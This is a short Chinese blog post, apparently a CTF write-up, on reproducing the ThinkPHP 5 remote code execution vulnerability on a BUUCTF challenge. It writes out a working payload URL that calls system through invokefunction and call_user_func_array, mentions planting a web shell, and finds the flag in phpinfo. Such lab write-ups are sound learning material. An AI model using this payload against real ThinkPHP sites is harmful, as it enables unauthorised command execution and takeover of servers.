CVE漏洞复现(代码执行漏洞)

命令执行CVE

[ThinkPHP]5-Rce

打开题目发现是thinkphp5
thinkphp5有一个代码执行漏洞我们百度可以知道只要在?后面加上index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=(linux指令)我们就可以执行想执行的linux命令。

http://node4.buuoj.cn:28875/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
image
执行ls与find命令
发现找不到flag我们直接写一个shell进去(这里因为linux shell脚本 会过滤$_REQUEST的原因所以我们加上\来转义)
image
最后在phpinfo中发现了flag
image

posted @   smart_ql  阅读(163)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
点击右上角即可分享
微信分享提示